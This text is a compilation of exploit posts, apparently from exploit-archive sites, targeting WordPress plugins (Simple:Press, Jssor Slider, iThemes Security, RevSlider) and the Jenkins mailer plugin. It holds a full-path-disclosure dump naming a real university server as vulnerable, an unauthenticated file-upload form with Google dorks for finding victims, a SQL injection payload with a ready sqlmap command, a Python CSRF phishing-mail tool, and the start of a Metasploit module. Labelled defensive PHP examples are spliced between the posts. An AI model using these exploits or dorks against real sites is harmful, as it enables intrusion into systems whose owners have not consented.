      Fatal error: Uncaught Error: Call to undefined function __() in /nfs/bronfs/uwfs/hw00/d84/triolive/wordpress/wp-content/plugins/simple-forum/admin/panel-forums/sfa-forums.php:11 Stack trace: #0 {main} thrown in /nfs/bronfs/uwfs/hw00/d84/triolive/wordpress/wp-content/plugins/simple-forum/admin/panel-forums/sfa-forums.php on line 11

      # Exploit : /wp-content/plugins/simple-forum/admin/panel-integration/sfa-integration.php
      Fatal error: Uncaught Error: Call to undefined function __() in /nfs/bronfs/uwfs/hw00/d84/triolive/wordpress/wp-content/plugins/simple-forum/admin/panel-integration/sfa-integration.php:11 Stack trace: #0 {main} thrown in /nfs/bronfs/uwfs/hw00/d84/triolive/wordpress/wp-content/plugins/simple-forum/admin/panel-integration/sfa-integration.php on line 11

      # Exploit : /wp-content/plugins/simple-forum/admin/panel-options/sfa-options.php
      Fatal error: Uncaught Error: Call to undefined function __() in /nfs/bronfs/uwfs/hw00/d84/triolive/wordpress/wp-content/plugins/simple-forum/admin/panel-options/sfa-options.php:11 Stack trace: #0 {main} thrown in /nfs/bronfs/uwfs/hw00/d84/triolive/wordpress/wp-content/plugins/simple-forum/admin/panel-options/sfa-options.php on line 11

      # Exploit : /wp-content/plugins/simple-forum/admin/panel-permissions/sfa-permissions.php
      Fatal error: Uncaught Error: Call to undefined function __() in /nfs/bronfs/uwfs/hw00/d84/triolive/wordpress/wp-content/plugins/simple-forum/admin/panel-permissions/sfa-permissions.php:11 Stack trace: #0 {main} thrown in /nfs/bronfs/uwfs/hw00/d84/triolive/wordpress/wp-content/plugins/simple-forum/admin/panel-permissions/sfa-permissions.php on line 11

      # Exploit : /wp-content/plugins/simple-forum/admin/panel-profiles/sfa-profiles.php
      Fatal error: Uncaught Error: Call to undefined function __() in /nfs/bronfs/uwfs/hw00/d84/triolive/wordpress/wp-content/plugins/simple-forum/admin/panel-profiles/sfa-profiles.php:11 Stack trace: #0 {main} thrown in /nfs/bronfs/uwfs/hw00/d84/triolive/wordpress/wp-content/plugins/simple-forum/admin/panel-profiles/sfa-profiles.php on line 11

      # Exploit : /wp-content/plugins/simple-forum/admin/panel-tags/sfa-tags.php
      Fatal error: Uncaught Error: Call to undefined function __() in /nfs/bronfs/uwfs/hw00/d84/triolive/wordpress/wp-content/plugins/simple-forum/admin/panel-tags/sfa-tags.php:11 Stack trace: #0 {main} thrown in /nfs/bronfs/uwfs/hw00/d84/triolive/wordpress/wp-content/plugins/simple-forum/admin/panel-tags/sfa-tags.php on line 11

      # Exploit : /wp-content/plugins/simple-forum/admin/panel-usergroups/sfa-usergroups.php
      Fatal error: Uncaught Error: Call to undefined function __() in /nfs/bronfs/uwfs/hw00/d84/triolive/wordpress/wp-content/plugins/simple-forum/admin/panel-usergroups/sfa-usergroups.php:11 Stack trace: #0 {main} thrown in /nfs/bronfs/uwfs/hw00/d84/triolive/wordpress/wp-content/plugins/simple-forum/admin/panel-usergroups/sfa-usergroups.php on line 11

      # Exploit : /wp-content/plugins/simple-forum/admin/sfa-framework.php
      Fatal error: Uncaught Error: Call to undefined function __() in /nfs/bronfs/uwfs/hw00/d84/triolive/wordpress/wp-content/plugins/simple-forum/admin/sfa-framework.php:10 Stack trace: #0 {main} thrown in /nfs/bronfs/uwfs/hw00/d84/triolive/wordpress/wp-content/plugins/simple-forum/admin/sfa-framework.php on line 10

      # Exploit : /wp-content/plugins/simple-forum/admin/sfa-notice.php
      Fatal error: Uncaught Error: Call to undefined function __() in /nfs/bronfs/uwfs/hw00/d84/triolive/wordpress/wp-content/plugins/simple-forum/admin/sfa-notice.php:11 Stack trace: #0 {main} thrown in /nfs/bronfs/uwfs/hw00/d84/triolive/wordpress/wp-content/plugins/simple-forum/admin/sfa-notice.php on line 11

      # Exploit : /wp-content/plugins/simple-forum/admin/panel-toolbox/sfa-toolbox.php
      Fatal error: Uncaught Error: Call to undefined function __() in /nfs/bronfs/uwfs/hw00/d84/triolive/wordpress/wp-content/plugins/simple-forum/admin/panel-toolbox/sfa-toolbox.php:11 Stack trace: #0 {main} thrown in /nfs/bronfs/uwfs/hw00/d84/triolive/wordpress/wp-content/plugins/simple-forum/admin/panel-toolbox/sfa-toolbox.php on line 11

      # Exploit : /wp-content/plugins/simple-forum/admin/panel-users/sfa-users.php
      Fatal error: Uncaught Error: Call to undefined function __() in /nfs/bronfs/uwfs/hw00/d84/triolive/wordpress/wp-content/plugins/simple-forum/admin/panel-users/sfa-users.php:11 Stack trace: #0 {main} thrown in /nfs/bronfs/uwfs/hw00/d84/triolive/wordpress/wp-content/plugins/simple-forum/admin/panel-users/sfa-users.php on line 11

      # Exploit : /wp-content/plugins/simple-forum/sf-loader-admin.php
      Fatal error: Uncaught Error: Call to undefined function __() in /nfs/bronfs/uwfs/hw00/d84/triolive/wordpress/wp-content/plugins/simple-forum/sf-loader-admin.php:10 Stack trace: #0 {main} thrown in
/nfs/bronfs/uwfs/hw00/d84/triolive/wordpress/wp-content/plugins/simple-forum/sf-loader-admin.php on line 10 # Exploit : /wp-content/plugins/simple-forum/template-tags/sf-widgets.php Deprecated: Methods with the same name as their class will not be constructors in a future version of PHP; WP_Widget_SPF has a deprecated constructor in /nfs/bronfs/uwfs/hw00/d84/triolive/wordpress/wp-content/plugins/simple-forum/template-tags/sf-widgets.php on line 15 Access Denied # Exploit : /wp-content/plugins/simple-forum/editors/bbcode/sf-bbcodeinit.php Fatal error: Uncaught Error: Call to undefined function __() in /nfs/bronfs/uwfs/hw00/d84/triolive/wordpress/wp-content/plugins/simple-forum/editors/bbcode/sf-bbcodeinit.php:10 Stack trace: #0 {main} thrown in /nfs/bronfs/uwfs/hw00/d84/triolive/wordpress/wp-content/plugins/simple-forum/editors/bbcode/sf-bbcodeinit.php on line 10 # Exploit : /wp-content/plugins/simple-forum/editors/html/sf-htmlinit.php Fatal error: Uncaught Error: Call to undefined function __() in /nfs/bronfs/uwfs/hw00/d84/triolive/wordpress/wp-content/plugins/simple-forum/editors/html/sf-htmlinit.php:10 Stack trace: #0 {main} thrown in /nfs/bronfs/uwfs/hw00/d84/triolive/wordpress/wp-content/plugins/simple-forum/editors/html/sf-htmlinit.php on line 10 Exploit : /wp-content/plugins/simple-forum/help/documentation/database-script.sql Database: simple:press forum Version 4.2.2 Exploit : /wp-content/plugins/simple-forum/install/install-error.log Simple Forum İnstallation Log Files Exploit : /wp-content/plugins/simple-forum/install/sf-install.php Fatal error: Uncaught Error: Call to undefined function __() in /nfs/bronfs/uwfs/hw00/d84/triolive/wordpress/wp-content/plugins/simple-forum/install/sf-install.php:10 Stack trace: #0 {main} thrown in /nfs/bronfs/uwfs/hw00/d84/triolive/wordpress/wp-content/plugins/simple-forum/install/sf-install.php on line 10 /wp-content/plugins/simple-forum/install/sf-upgrade.php Fatal error: Uncaught Error: Call to undefined function __() in 
/nfs/bronfs/uwfs/hw00/d84/triolive/wordpress/wp-content/plugins/simple-forum/install/sf-upgrade.php:10 Stack trace: #0 {main} thrown in /nfs/bronfs/uwfs/hw00/d84/triolive/wordpress/wp-content/plugins/simple-forum/install/sf-upgrade.php on line 10 It gives same error : /wp-login.php?action=login&view=forum /wp-login.php?action=register&view=forum /wp-login.php?action=lostpassword&view=forum /wp-content/plugins/simple-forum/editors/tinymce/plugins/filemanager/css/filemanager-tm.css.php /wp-content/plugins/simple-forum/editors/tinymce/plugins/filemanager/fm-browse-tab.php /wp-content/plugins/simple-forum/editors/tinymce/plugins/filemanager/fm-edit-tab.php /wp-content/plugins/simple-forum/editors/tinymce/plugins/filemanager/fm-folder-tab.php /wp-content/plugins/simple-forum/editors/tinymce/plugins/filemanager/fm-tinymce.js.php /wp-content/plugins/simple-forum/editors/tinymce/plugins/filemanager/fm-upload-tab.php /wp-content/plugins/simple-forum/editors/tinymce/plugins/filemanager/upload_file.php /wp-content/plugins/simple-forum/editors/tinymce/plugins/filemanager/upload_process.php Error : Your PHP installation appears to be missing the MySQL extension which is required by WordPress. Found Templates by SimpleForum => /wp-content/plugins/simple-forum/editors/tinymce/plugins/inlinepopups/template.htm ################################################################################################# # Example Site for Full Path Disclosure and SQL Injection Vulnerability => + University of Washington - Departments Web Server Information Technology WebSite is Vulnerable. 
Apache/2.2.32 (Unix) mod_ssl/2.2.32 OpenSSL/1.0.1e-fips mod_pubcookie/3.3.4a mod_uwa/3.2.1 Phusion_Passenger/3.0.11 Server at depts.washington.edu Port 80 depts.washington.edu/triolive/wordpress/wp-content/plugins/simple-forum/editors/tinymce/plugins/spellchecker/rpc.php => [ Proof of Concept ] => archive.is/76tXR Errors displaying on the page : Deprecated: Methods with the same name as their class will not be constructors in a future version of PHP; Moxiecode_Logger has a deprecated constructor in /nfs/bronfs/uwfs/hw00/d84/triolive/wordpress/wp-content/plugins/simple-forum/editors/tinymce/plugins/spellchecker/classes/utils/Logger.php on line 21 Deprecated: Methods with the same name as their class will not be constructors in a future version of PHP; Moxiecode_JSONReader has a deprecated constructor in /nfs/bronfs/uwfs/hw00/d84/triolive/wordpress/wp-content/plugins/simple-forum/editors/tinymce/plugins/spellchecker/classes/utils/JSON.php on line 26 Deprecated: Methods with the same name as their class will not be constructors in a future version of PHP; Moxiecode_JSON has a deprecated constructor in /nfs/bronfs/uwfs/hw00/d84/triolive/wordpress/wp-content/plugins/simple-forum/editors/tinymce/plugins/spellchecker/classes/utils/JSON.php on line 362 Warning: Use of undefined constant PSPELL_FAST - assumed 'PSPELL_FAST' (this will throw an Error in a future version of PHP) in /nfs/bronfs/uwfs/hw00/d84/triolive/wordpress/wp-content/plugins/simple-forum/editors/tinymce/plugins/spellchecker/config.php on line 9 Warning: Use of undefined constant PSPELL_FAST - assumed 'PSPELL_FAST' (this will throw an Error in a future version of PHP) in /nfs/bronfs/uwfs/hw00/d84/triolive/wordpress/wp-content/plugins/simple-forum/editors/tinymce/plugins/spellchecker/config.php on line 15 Deprecated: Methods with the same name as their class will not be constructors in a future version of PHP; SpellChecker has a deprecated constructor in 
/nfs/bronfs/uwfs/hw00/d84/triolive/wordpress/wp-content/plugins/simple-forum/editors/tinymce/plugins/spellchecker/classes/SpellChecker.php on line 9 Warning: Cannot modify header information - headers already sent by (output started at /nfs/bronfs/uwfs/hw00/d84/triolive/wordpress/wp-content/plugins/simple-forum/editors/tinymce/plugins/spellchecker/classes/utils/Logger.php:21) in /nfs/bronfs/uwfs/hw00/d84/triolive/wordpress/wp-content/plugins/simple-forum/editors/tinymce/plugins/spellchecker/rpc.php on line 12 Warning: Cannot modify header information - headers already sent by (output started at /nfs/bronfs/uwfs/hw00/d84/triolive/wordpress/wp-content/plugins/simple-forum/editors/tinymce/plugins/spellchecker/classes/utils/Logger.php:21) in /nfs/bronfs/uwfs/hw00/d84/triolive/wordpress/wp-content/plugins/simple-forum/editors/tinymce/plugins/spellchecker/rpc.php on line 13 Warning: Cannot modify header information - headers already sent by (output started at /nfs/bronfs/uwfs/hw00/d84/triolive/wordpress/wp-content/plugins/simple-forum/editors/tinymce/plugins/spellchecker/classes/utils/Logger.php:21) in /nfs/bronfs/uwfs/hw00/d84/triolive/wordpress/wp-content/plugins/simple-forum/editors/tinymce/plugins/spellchecker/rpc.php on line 14 Warning: Cannot modify header information - headers already sent by (output started at /nfs/bronfs/uwfs/hw00/d84/triolive/wordpress/wp-content/plugins/simple-forum/editors/tinymce/plugins/spellchecker/classes/utils/Logger.php:21) in /nfs/bronfs/uwfs/hw00/d84/triolive/wordpress/wp-content/plugins/simple-forum/editors/tinymce/plugins/spellchecker/rpc.php on line 15 Warning: Cannot modify header information - headers already sent by (output started at /nfs/bronfs/uwfs/hw00/d84/triolive/wordpress/wp-content/plugins/simple-forum/editors/tinymce/plugins/spellchecker/classes/utils/Logger.php:21) in /nfs/bronfs/uwfs/hw00/d84/triolive/wordpress/wp-content/plugins/simple-forum/editors/tinymce/plugins/spellchecker/rpc.php on line 16 Warning: Cannot 
modify header information - headers already sent by (output started at /nfs/bronfs/uwfs/hw00/d84/triolive/wordpress/wp-content/plugins/simple-forum/editors/tinymce/plugins/spellchecker/classes/utils/Logger.php:21) in /nfs/bronfs/uwfs/hw00/d84/triolive/wordpress/wp-content/plugins/simple-forum/editors/tinymce/plugins/spellchecker/rpc.php on line 17
Warning: Cannot modify header information - headers already sent by (output started at /nfs/bronfs/uwfs/hw00/d84/triolive/wordpress/wp-content/plugins/simple-forum/editors/tinymce/plugins/spellchecker/classes/utils/Logger.php:21) in /nfs/bronfs/uwfs/hw00/d84/triolive/wordpress/wp-content/plugins/simple-forum/editors/tinymce/plugins/spellchecker/rpc.php on line 18
{"result":null,"id":null,"error":{"errstr":"Could not get raw post data.","errfile":"","errline":null,"errcontext":"","level":"FATAL"}}
#################################################################################################
Source [ My Topic ] => cyberizm.org/cyberizm-wordpress-simplepress-simpleforum-editors-tinymce-vuln.html
#################################################################################################
# Example Sites =>
11.

#################################################################################################
# Exploit Title : WordPress DrcSystems EthicSolutions Jssor-Slider Library Plugin Arbitrary File Upload Vulnerability
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
# Date : 19/06/2018
# Vendor Homepage : jssor.com - drcsystems.com - ethicsolutions.com - wordpress.org/plugins/jssor-slider/
# Tested On : Windows
# Category : WebApps
# Exploit Risk : Medium
# CWE : CWE-284 [ Improper Access Control ] - CWE-862 [ Missing Authorization ]
# CXSecurity : cxsecurity.com/ascii/WLB-2018060226
#####################################################################################################

Description :
“Jssor Slider by jssor.com” is open source software. Jssor Slider is a professional, lightweight and easy-to-use slideshow/slider/gallery/carousel/banner; it is optimized for mobile devices with tons of unique features.

# Key Features : Touch Swipe - 200+ Slideshow Transitions - Layer Animation - Fast Loading, load slider html code from disk cache directly - High Performance Light Weight - Easy to Use - Repeated Layer Animation - Image Layer - Text/Html Layer - Panel Layer - Nested Layer - Layer Blending - Clip Mask Multiplex Transition - z-index Animation - Timeline Break - Dozens of bullet/arrow/thumbnail skins
#####################################################################################################

Affected Jssor Slider Plugin Code :
When the plugin is active the function register_ajax_calls() in the file /lib/jssor-slider-class.php is run:

    public function register_ajax_calls() {
        if ( isset( $_REQUEST['action'] ) ) {
            switch ( $_REQUEST['action'] ) {
                case 'add_new_slider_library' :
                    add_action( 'admin_init', 'jssor_slider_library' );
                    function jssor_slider_library() {
                        include_once JSSOR_SLIDER_PATH . '/lib/add-new-slider-class.php';
                    }
                    break;
                case 'upload_library' :
                    add_action( 'admin_init', 'upload_library' );
                    function upload_library() {
                        include_once JSSOR_SLIDER_PATH . '/lib/upload.php';
                    }
                    break;
            }
        }
    }

That gives anyone access to two AJAX functions that are only intended to be accessible to those logged in as Administrators. The upload_library() function accessible through that handles uploading a file through /lib/upload.php. That file also doesn't do any checks as to who is making the request and does not restrict what type of files can be uploaded.

It is also possible to exploit this by sending a request directly to the file /lib/upload.php, as long as the undefined constant in that isn't treated as an error.

The following proof of concept will upload the selected file to the directory /wp-content/jssor-slider/jssor-uploads/. Make sure to replace “[path to WordPress]” with the location of WordPress.
#####################################################################################################
# Google Dorks :
inurl:''/wp-content/jssor-slider/jssor-uploads/''
intext:''Managed by Web development company Ethic Solutions''
intext:''Todos los derechos reservados © Ecuaauto - Distribuidor autorizado Chevrolet Ecuador''
intext:''Website Developed by DRC Systems''
#####################################################################################################
# PoC : /wp-admin/admin-ajax.php?param=upload_slide&action=upload_library
# Error : {"jsonrpc" : "2.0", "result" : null, "id" : "id"}
# Exploit Code :

    <html>
    <body>
    <form action="http://[PATH]/wp-admin/admin-ajax.php?param=upload_slide&action=upload_library" method="POST" enctype="multipart/form-data">
    <input type="file" name="file" />
    <input type="submit" value="Submit" />
    </form>
    </body>
    </html>

# Uploaded File Path : /wp-content/jssor-slider/jssor-uploads/.....
# Allowed File Extensions : With the exception of php and asp [ Not Allowed ], other file extensions are allowed. For example html and txt and etcetera....
# Usage : Use with XAMPP Control Panel and with your Localhost [ 127.0.0.1 ] localhost/jssorsliderexploiter.html
#################################################################################################
# Example All Vulnerable Sites =>
############################################################################
Reference [ Me ] : cyberizm.org/cyberizm-wordpress-drcsystems-ethicsolutions-jssorslider-exploit.html
#################################################################################################
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
#################################################################################################
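The advisory above names three missing checks (who is calling, a CSRF token, and what may be uploaded). As an added example that is neither the plugin's code nor the advisory author's, this is the shape an admin-only WordPress upload handler takes when all three are present; the hook name, nonce action and capability are assumptions chosen for illustration.

```php
<?php
// Added example, not the Jssor Slider plugin's code: an admin-only upload
// AJAX handler with the authorization, CSRF and file-type checks the
// advisory reports as missing. Hook name 'jssor_upload_library', nonce
// action 'jssor_upload_nonce' and the capability are assumptions.

// Vulnerable pattern as described in the advisory: admin-ajax.php is
// reachable without logging in, and the include runs on admin_init for any
// request carrying action=upload_library, so nobody ever checks who asked.
function jssor_vulnerable_register() {
    if ( isset( $_REQUEST['action'] ) && 'upload_library' === $_REQUEST['action'] ) {
        add_action( 'admin_init', function () {
            include_once JSSOR_SLIDER_PATH . '/lib/upload.php'; // no auth, no type check
        } );
    }
}

// Hardened form: a wp_ajax_ hook only (no wp_ajax_nopriv_ twin, so anonymous
// callers just get "0" back from admin-ajax.php), then capability, nonce and
// file-type checks before anything touches the disk.
add_action( 'wp_ajax_jssor_upload_library', 'jssor_hardened_upload_library' );

function jssor_hardened_upload_library() {
    // 1. Authorization: the plugin's upload UI is meant for administrators.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_send_json_error( array( 'message' => 'forbidden' ), 403 );
    }
    // 2. CSRF: the admin page that renders the form must emit this nonce
    //    (wp_nonce_field( 'jssor_upload_nonce', 'nonce' )); a cross-site
    //    form such as the PoC above cannot know it.
    check_ajax_referer( 'jssor_upload_nonce', 'nonce' );

    if ( empty( $_FILES['file']['tmp_name'] ) || ! is_uploaded_file( $_FILES['file']['tmp_name'] ) ) {
        wp_send_json_error( array( 'message' => 'no file' ), 400 );
    }

    // 3. Allowlist, not a denylist: only slider image types pass. Everything
    //    else (php, asp, html, txt, svg ...) is rejected, instead of blocking
    //    two extensions and letting the rest through.
    $allowed = array(
        'jpg|jpeg' => 'image/jpeg',
        'png'      => 'image/png',
        'gif'      => 'image/gif',
    );
    $check = wp_check_filetype_and_ext( $_FILES['file']['tmp_name'], $_FILES['file']['name'], $allowed );
    if ( empty( $check['ext'] ) || empty( $check['type'] ) ) {
        wp_send_json_error( array( 'message' => 'file type not allowed' ), 415 );
    }

    // 4. Let WordPress move the file: sanitized unique filename, and the same
    //    mime allowlist enforced a second time by wp_handle_upload().
    require_once ABSPATH . 'wp-admin/includes/file.php';
    $result = wp_handle_upload( $_FILES['file'], array( 'test_form' => false, 'mimes' => $allowed ) );
    if ( isset( $result['error'] ) ) {
        wp_send_json_error( array( 'message' => $result['error'] ), 400 );
    }
    wp_send_json_success( array( 'url' => $result['url'] ) );
}
```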
12.

# Exploit Title: WordPress Plugin iThemes Security 7.0.2 - Authenticated SQL Injection
# Exploit Author: Rednofozi
# Website: https://anonysec.org
# Vendor Homepage: https://ithemes.com/
# Software Link: https://wordpress.org/plugins/better-wp-security/
# Version/s: 7.0.2 and below
# Patched Version: 7.0.3
# CVE : 2018-12636
# me : rednofozi@yahoo.com

Plugin description:
iThemes Security works to lock down WordPress, fix common holes, stop automated attacks and strengthen user credentials. With advanced features for experienced users, this WordPress security plugin can help harden WordPress.

Description:
WordPress Plugin iThemes Security (better-wp-security) before 7.0.3 allows remote authenticated users to execute arbitrary SQL commands via the 'orderby' parameter in the 'itsec-logs' page to wp-admin/admin.php.

Technical details:
Parameter orderby is vulnerable because the backend variable $sort_by_column is not escaped.

File: better-wp-security/core/admin-pages/logs-list-table.php
Line 271: if ( isset( $_GET['orderby'], $_GET['order'] ) ) {
Line 272:     $sort_by_column = $_GET['orderby'];

File: better-wp-security/core/lib/log-util.php
Line 168: $query .= ' ORDER BY ' . implode( ', ', $sort_by_column );

Proof of Concept (PoC):
The following GET request will cause the SQL query to execute and sleep for 10 seconds if clicked on as an authenticated admin:
http://localhost/wp-admin/admin.php?page=itsec-logs&filter=malware&orderby=remote_ip%2c(select*from(select(sleep(10)))a)&order=asc&paged=0

Using SQLMAP:
sqlmap -u 'http://localhost/wp-admin/admin.php?page=itsec-logs&filter=malware&orderby=remote_ip*&order=asc&paged=0' --cookie "wordpress_b...; wordpress_logged_in_bbf...;" --string "WordPress" --dbms=MySQL --technique T --level 5 --risk 3

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
# Discovered by : Rednofozi
#--tnx to : ReZa CLONER , Moeein Seven. DOCTOR ROBOT .soldier anonymous. milad shadow
http://www.exploit4arab.org/exploits/2001
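The root cause in the post above is an identifier (a column name) taken from the request and concatenated into ORDER BY, which no escaping function can fix. As an added example that is not iThemes Security's own code, here is the vulnerable clause beside an allowlist-based version; the column names are assumptions for illustration.

```php
<?php
// Added example, not iThemes Security's code: sorting a log table by
// request-controlled 'orderby' / 'order' parameters without letting them
// reach the SQL string. Column names below are assumptions for illustration.

// Vulnerable pattern described in the advisory: the raw parameter is joined
// straight into the query, so a value such as
// "remote_ip,(select*from(select(sleep(10)))a)" is executed as SQL.
function itsec_vulnerable_order_clause( $sort_by_column ) {
    return ' ORDER BY ' . implode( ', ', (array) $sort_by_column );
}

// Hardened form. Identifiers cannot be bound with $wpdb->prepare() (it only
// quotes values), so the fix is an allowlist: every requested column must
// match a known column exactly, and the direction is one of two literals.
function itsec_safe_order_clause( $orderby_param, $order_param ) {
    $allowed_columns = array( 'id', 'timestamp', 'module', 'type', 'remote_ip', 'user_id' );

    $columns = array();
    foreach ( explode( ',', (string) $orderby_param ) as $candidate ) {
        $candidate = strtolower( trim( $candidate ) );
        if ( in_array( $candidate, $allowed_columns, true ) ) {
            $columns[] = '`' . $candidate . '`';
        }
        // Anything not on the list is dropped; it is never interpolated.
    }
    if ( empty( $columns ) ) {
        $columns = array( '`timestamp`' ); // safe default when nothing matched
    }
    $direction = ( 'desc' === strtolower( (string) $order_param ) ) ? 'DESC' : 'ASC';

    return ' ORDER BY ' . implode( ', ', $columns ) . ' ' . $direction;
}

// Demonstration with the PoC value from the post (constructed input): the
// first line shows the injected subquery reaching SQL, the second shows only
// the allowlisted column surviving.
$orderby = 'remote_ip,(select*from(select(sleep(10)))a)';
echo 'vulnerable: ' . itsec_vulnerable_order_clause( explode( ',', $orderby ) ) . "\n";
echo 'hardened:   ' . itsec_safe_order_clause( $orderby, 'asc' ) . "\n";
```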
13.

# Exploit Title : Jenkins mailer plugin 1.20 - Cross-Site Request Forgery
# Date : 2018-09-03
# Exploit Author : Rednofozi
# Vendor Homepage : https://jenkins.io/
# Software Link : [https://updates.jenkins.io/download/plugins/mailer/1.20/mailer.hpi]
# Version: [Below Version 1.20 (1.1 ~ 1.20) ]
# Tested on : Linux , Windows
# CVE : CVE-2018-8718

import email.message
import smtplib
import getpass

payload_list = ['url', 'subject', 'cover_message', 'sender', 'reciver', 'test_email',
                'smtp_server', 'l_id', 'l_pw']
table = {}
for i in payload_list:
    table.update({i: ''})


def send_mail():
    msg = email.message.Message()
    msg['Subject'] = table['subject']
    msg['From'] = table['sender']
    msg['To'] = table['reciver']
    msg.add_header('Content-Type', 'text/html')
    msg.set_payload('<a href="' + table['url'] + '/descriptorByName/hudson.tasks.Mailer/sendTestMail?'
                    'charset=UTF-8&sendTestMailTo=' + table['test_email'] + '&adminAddress=' + table['reciver'] +
                    '&smtpPort=465&smtpServer=' + table['smtp_server'] + '&smtpAuthPasswordSecret=' + table['l_pw'] +
                    '&useSMTPAuth=true&useSsl=true&smtpAuthUserName=' + table['l_id'] + '"> ' +
                    table['cover_message'] + '</a>')
    s = smtplib.SMTP(table['smtp_server'])
    s.starttls()
    s.login(table['l_id'], table['l_pw'])
    s.sendmail(msg['From'], [msg['To']], msg.as_string())


def url_set():
    url = str(input("Jenkins Server's URL(ex : http://vuln.jenkins.com) : "))
    if len(url) <= 0:
        print(" Can't Be Null!")
        url_set()
    elif url[0:4] != "http":
        print(" URL must start with 'http://' ")
        url_set()
    else:
        table['url'] = url


def subject_set():
    subject = str(input("SUBJECT [Default : Look! Warning with your Jenkins] : "))
    if len(subject) <= 0:
        subject = "Look! Warning with your Jenkins"
    table['subject'] = subject


def cover_message():
    cover_message = str(input("Cover Message [Default : Here is your Vulnable!] : "))
    if len(cover_message) <= 0:
        cover_message = "Here is your Vulnable!"
    table['cover_message'] = cover_message


def sender():
    sender = str(input("Attacker E-mail(ex : attacker@abcd.com) : "))
    if len(sender) <= 0:
        print(" Can't Be Null!")
        sender()
    else:
        table['sender'] = sender


def reciver():
    reciver = str(input("Admin's E-mail(ex : admin@abcd.com) : "))
    if len(reciver) <= 0:
        print(" Can't Be Null!")
        reciver()
    else:
        table['reciver'] = reciver


def test_email():
    test_email = str(input("Tester E-mail(ex : tester@abcd.com) : "))
    if len(test_email) <= 0:
        print(" Can't Be Null!")
        test_email()
    else:
        table['test_email'] = test_email


def smtp_server():
    smtp_server = str(input("SMTP_Server [Default : smtp.gmail.com] : "))
    if len(smtp_server) <= 0:
        smtp_server = "smtp.gmail.com"
    table['smtp_server'] = smtp_server


def l_id():
    l_id = str(input("Your SMTP_Server ID : "))
    if len(l_id) <= 0:
        print(" Can't Be Null!")
        l_id()
    else:
        table['l_id'] = l_id


def l_pw():
    l_pw = str(getpass.getpass("Your SMTP_Server PW : "))
    if len(l_pw) <= 0:
        print(" Can't Be Null!")
        l_pw()
    else:
        table['l_pw'] = l_pw


def set_all():
    url_set()
    subject_set()
    cover_message()
    sender()
    reciver()
    test_email()
    smtp_server()
    l_id()
    l_pw()
    print("Setting Complete! Use 'show' to check options")


set_help = {
    'all': "Set all payload",
    'help': "Show set command's help",
    'url_set': "Set only 'url_set' payload",
    'subject_set': "Set only 'subject_set' payload",
    'cover_message': "Set only 'cover_message' payload",
    'sender': "Set only 'sender' payload",
    'reciver': "Set only 'reciver' payload",
    'test_email': "Set only 'test_email' payload",
    'smtp_server': "Set only 'smtp_server' payload",
    'l_id': "Set only 'l_id' payload",
    'l_pw': "Set only 'l_pw' payload",
}


def set_select(a):
    if a == "all":
        set_all()
    elif a == "url_set":
        url_set()
    elif a == "subject_set":
        subject_set()
    elif a == "cover_message":
        cover_message()
    elif a == "sender":
        sender()
    elif a == "reciver":
        reciver()
    elif a == "test_email":
        test_email()
    elif a == "smtp_server":
        smtp_server()
    elif a == "l_id":
        l_id()
    elif a == "l_pw":
        l_pw()
    elif a == "help":
        for i in set_help:
            print(" -%-20s %-s" % (i, set_help[i]))
        print('')


while True:
    direct = str(input("CVE-2018-8718 >> ")).lower()
    if direct == "help":
        print("""
 %-10s Show this help menu.
 %-10s [-all / -help / -url_set / -subject_set / .... ]
 %-10s Set the Payload
 %-10s [-all] Show Current Setting.
 %-10s Send CSRF use current setting.
""" % ("help", "set", "", "show", "send"))
    elif direct[0:3] == "set":
        if ' -' not in direct:
            if direct == "set":
                set_option = ["help"]
            else:
                print(" Option error\n")
                continue
        else:
            set_option = direct.split(' -')[1:]
        okay = 1
        if len(set_option) == 1:
            if set_option[0] not in set_help:
                print(" Option error\n")
            else:
                set_select(set_option[0])
        elif len(set_option) >= 2:
            for i in set_option:
                if i in ['help', 'all']:
                    print(" *Option [-help / -all] cannot be used with other options\n")
                    okay = 0
                    break
            for i in set_option:
                if i not in set_help:
                    print(" Option error\n")
                    okay = 0
                    break
            if okay == 1:
                for i in set_option:
                    set_select(i)
    elif direct[:4] == "show":
        if " -" not in direct:
            if direct == "show":
                for i in table:
                    if i != "l_pw":
                        print(" %-20s %s" % (i, table[i]))
                print(" If you want to see l_pw... add [-all] option")
                print("")
            else:
                print(" Option error\n")
        else:
            show_option = direct.split(" -")[1:]
            if len(show_option) == 1 and show_option[0] == 'all':
                for i in table:
                    print(" %-20s %s" % (i, table[i]))
                print()
            else:
                print(" Option error\n")
    elif direct == "send":
        print(" Sending CSRF Mail.....")
        try:
            send_mail()
            print(" Succeeded!!\n")
        except Exception:
            print(" Fail....")
    elif direct == "exit":
        break
    else:
        print(" Usage : help\n")

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
# Discovered by : Rednofozi
#--tnx to : ReZa CLONER , Moeein Seven. DOCTOR ROBOT .soldier anonymous. milad shadow
http://www.exploit4arab.org/exploits/2002
14.

##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::HTTP::Wordpress
  include Msf::Exploit::FileDropper

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Wordpress RevSlider File Upload and Execute Vulnerability',
      'Description'    => %q{
        This module exploits an arbitrary PHP code upload in the WordPress ThemePunch
        Revolution Slider ( revslider ) plugin, version 3.0.95 and prior. The
        vulnerability allows for arbitrary file upload and remote code execution.
      },
      'Author'         =>
        [
          'Simo Ben youssef', # Vulnerability discovery
          'Tom Sellers <tom[at]fadedcode.net>' # Metasploit module
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          ['URL', 'https://whatisgon.wordpress.com/2014/11/30/another-revslider-vulnerability/'],
          ['EDB', '35385'],
          ['WPVDB', '7954'],
          ['OSVDB', '115118']
        ],
      'Privileged'     => false,
      'Platform'       => 'php',
      'Arch'           => ARCH_PHP,
      'Targets'        => [['ThemePunch Revolution Slider (revslider) 3.0.95', {}]],
      'DisclosureDate' => 'Nov 26 2015',
      'DefaultTarget'  => 0)
    )
  end

  def check
    release_log_url = normalize_uri(wordpress_url_plugins, 'revslider', 'release_log.txt')
    check_version_from_custom_file(release_log_url, /^\s*(?:version)\s*(\d{1,2}\.\d{1,2}(?:\.\d{1,2})?).*$/mi, '3.0.96')
  end

  def exploit
